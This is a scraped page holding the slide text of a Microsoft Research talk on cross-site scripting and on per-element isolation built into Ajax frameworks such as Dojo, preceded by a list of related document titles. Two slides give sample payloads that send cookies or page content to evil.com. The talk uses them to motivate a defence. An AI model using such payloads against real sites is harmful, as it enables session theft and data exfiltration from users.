Ben Livshits and Úlfar Erlingsson. Microsoft Research

Similar documents
Ben Livshits and Úlfar Erlingsson. Microsoft Research

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

CIS 4360 Secure Computer Systems XSS

Chrome Extension Security Architecture

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

WEB SECURITY: XSS & CSRF

Web basics: HTTP cookies

Helsinki University of Technology Department of Media Technology T Seminar on Multimedia Spring 2008.

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

P2_L12 Web Security Page 1

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Analysis of Hypertext Isolation Techniques for Cross-site Scripting Prevention. Mike Ter Louw Prithvi Bisht V.N. Venkatakrishnan

Information Security CS 526 Topic 8

CSCE 813 Internet Security Case Study II: XSS

Computer Security CS 426 Lecture 41

Application vulnerabilities and defences

Web Application Security. Philippe Bogaerts

Information Security CS 526 Topic 11

CS 161 Computer Security

GOING WHERE NO WAFS HAVE GONE BEFORE


The security of Mozilla Firefox s Extensions. Kristjan Krips

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

RIA Security - Broken By Design. Joonas Lehtinen IT Mill - CEO

A Server- and Browser-Transparent CSRF Defense for Web 2.0 Applications

Hacker Attacks on the Horizon: Web 2.0 Attack Vectors

Web Security: Vulnerabilities & Attacks

Security Research Advisory IBM WebSphere Portal Cross-Site Scripting Vulnerability

CSCD 303 Essential Computer Security Fall 2018

CSCD 303 Essential Computer Security Fall 2017

The Web of Confusion. Douglas Crockford Yahoo! Inc.

Web security: an introduction to attack techniques and defense methods

COMP9321 Web Application Engineering

s642 web security computer security adam everspaugh

COMP9321 Web Application Engineering

Code-Injection Attacks in Browsers Supporting Policies. Elias Athanasopoulos, Vasilis Pappas, and Evangelos P. Markatos FORTH-ICS

Biting the Hand that Feeds You

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Title: Multiple Remote Command Execution vulnerabilities on Avaya Intuity Audix LX (plus some client-side bugs)

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

CS 155 Project 2. Overview & Part A

OWASP Top 10 The Ten Most Critical Web Application Security Risks

Lecture 6: Web Security CS /17/2017

Solutions Business Manager Web Application Security Assessment

Web Security Computer Security Peter Reiher December 9, 2014

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

Finding Vulnerabilities in Web Applications

Your Scripts in My Page: What Could Possibly Go Wrong? Sebastian Lekies / Ben Stock Martin Johns

CSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno

Web Security IV: Cross-Site Attacks

NET 311 INFORMATION SECURITY

Vulnerability Analysis, Secure Development and Risk Management of Web 2.0 Applications OWASP. The OWASP Foundation

Web Security: Vulnerabilities & Attacks

IronWASP (Iron Web application Advanced Security testing Platform)

Web Application Security

AN EVALUATION OF THE GOOGLE CHROME EXTENSION SECURITY ARCHITECTURE

Attacking Web2.0. Daiki Fukumori Secure Sky Technology Inc.

RKN 2015 Application Layer Short Summary

CS 161 Computer Security

Progress Exchange June, Phoenix, AZ, USA 1

CS 161 Computer Security

last time: command injection

Web Security Part 2. Professor Ristenpart h9p:// rist at cs dot wisc dot edu

CS 161 Computer Security

CROSS SIIE SCRIPIING EXPlOITS AND DEFENSE

Security in a Mainframe Emulator. Chaining Security Vulnerabilities Until Disaster Strikes (twice) Author Tim Thurlings & Meiyer Goren

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Content Security Policy

Exploiting and Defending: Common Web Application Vulnerabilities

Web 2.0 Attacks Explained

sottotitolo System Security Introduction Milano, XX mese 20XX A.A. 2016/17 Federico Reghenzani

NoScript, CSP and ABE: When The Browser Is Not Your Enemy

Static analysis of PHP applications

John Coggeshall Copyright 2006, Zend Technologies Inc.

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CS 161 Computer Security

WHY CSRF WORKS. Implicit authentication by Web browsers

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Adon'tbe an Adobe victim

Web Application with AJAX. Kateb, Faris; Ahmed, Mohammed; Alzahrani, Omar. University of Colorado, Colorado Springs

Top 10 AJAX security holes & driving factors

Client Side Injection on Web Applications

Your Turn to Hack the OWASP Top 10!

Robust Defenses for Cross-Site Request Forgery

Go Secure Coding Practices

Secure Development Guide

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I

shortcut Tap into learning NOW! Visit for a complete list of Short Cuts. Your Short Cut to Knowledge

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Detecting XSS Based Web Application Vulnerabilities

Web Application Attacks

We will show you how we bypassed every XSS mitigation we tested. Mitigation bypass-ability via script gadget chains in 16 popular libraries

eb Security Software Studio

Solution of Exercise Sheet 5

Transcription:

Ben Livshits and Úlfar Erlingsson Microsoft Research

Web application vulnerabilities more common than ever before The usual suspects: code injection vulnerabilities SQL injection Cross site scripting (XSS) Cross-site request forgery (CSRF) etc. 2

String username = req.getparameter( username ); ServletResponseStream out = resp.getoutputstream(); out.println("<p>hello, " + username + ".</p>"); http://victim.com?username= <script> location = http://evil.com/stealcookie.cgi?cookie= + escape(document.cookie)</script> Most vulnerabilities are coding bugs Making a mistake is very easy: default is often unsafe Getting things right requires non-trivial effort Can you blame the developer for getting it wrong? 3

Must deal with problem complexity Filter input to remove <script>, <object>, etc. To see how complex this is, check out XSS Cheat Sheet for filter evasion: http://ha.ckers.org/xss.html Need to find all ways that malicious input can propagate through the application 4

Much more execution happens on the client Tons of code running within the browser Many new types of applications Rich Webmail clients: gmail, hotmail, etc. Mash-ups: Live.com, google.com/ig, protopage.com Text editors: Writely, jot.com, etc. Entire operating systems: YouOS, etc. 5

6

<td background= orchid onmouseover= showtooltip( orchid ) > orchid 7

8

feed injection steal data from secure feed 9

With Web 2.0 upon us, we have a chance to make things right Secure code should be easier to write It should be the default, not an exception Developer has to go out of her way to get it wrong How to get there? Most applications rely on frameworks Exploit frameworks to achieve better security Applications built on top of frameworks get better security properties by construction for free 10

Application code Most of the effort applied here Framework libraries Per-widget Web safe application defaults Per-widget safe defaults Client-side enforcement 11

General enforcement strategies METs [Erlingsson, et.al. 2007] JavaScript rewriting [Yu et.al. 2007] Enforcing specific properties Disallow code execution: BEEP [Jim, et.al. 2007] Isolation techniques: MashupOS/Subspace [Howell, et.al. 2007] This paper: how to accomplish isolation by default 12

1. Refine same-origin policy to provide fine-grained isolation of user interface element within an HTML page 2. Show how this approach mitigates common code injection problems, including cross-site scripting and feed injection 3. Outline how this technique can be incorporated within a framework such as the Dojo Toolkit or Microsoft Atlas 13

Frame 1: evil.com <html> <script> m = document. getelementbyid( mydiv); location = host = evil.com protocol = http http://evil.com?submit.cgi= + port = 8000 m.tostring(); </script> </html> Frame 2: good.com <html> <div id= mydiv > credit card :1234 5678 9012 3456 </div> </html> host protocol = http port = 8000 = good.com 14

<html> host = evil.com protocol = http port = 8000 <head> <body> <script> <script> <div> <div> host = good.com protocol = http port = 8000 <html> <head> <body> <script> <script> <div> <div> 15

16

17

<div principal= body > Blog entries <div principal= entry > today s entry <div principal= comment > comment #1 </div> <div principal= comment > comment #2 </div> </div> <div principal= entry > yesterday s entry </div> </div> 18

<html> <body> Cookies principal=() (same as http-only) principal=(body) <div principal= body > <div> principal=(body; entry) <div principal= entry > principal=(body; entry) <div principal= entry > principal=(body; entry) <div principal= entry > <div principal= comment > principal=(body; entry; comment) <div principal= comment > principal=(body; entry; comment) 19

Manual principal specification: tedious and error-prone Our solution Change the framework to generate new unique principals Framework users get component isolation for free Examples that follow use the Dojo Toolkit for constructing Ajax applications 20

FRAMEWORKS AJAX.NET Dojo Toolkit Prototype Script.aculo.us Yahoo! UI FEATURES Text box Text area Drop-down list Check-boxes Trees 21

<div id="contentpane" dojotype="contentpane" sizemin="20" sizeshare="80" href="mail/mailaccount.html > </div> <div principal= contentpane$1 >... </div> 22

Modern Ajax-based Web 2.0 applications often require fine-grained security guarantees Component isolation can be implemented as an extension to the same-origin policy of JavaScript Frameworks provide a great opportunity to inject safe programming defaults for free 23

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback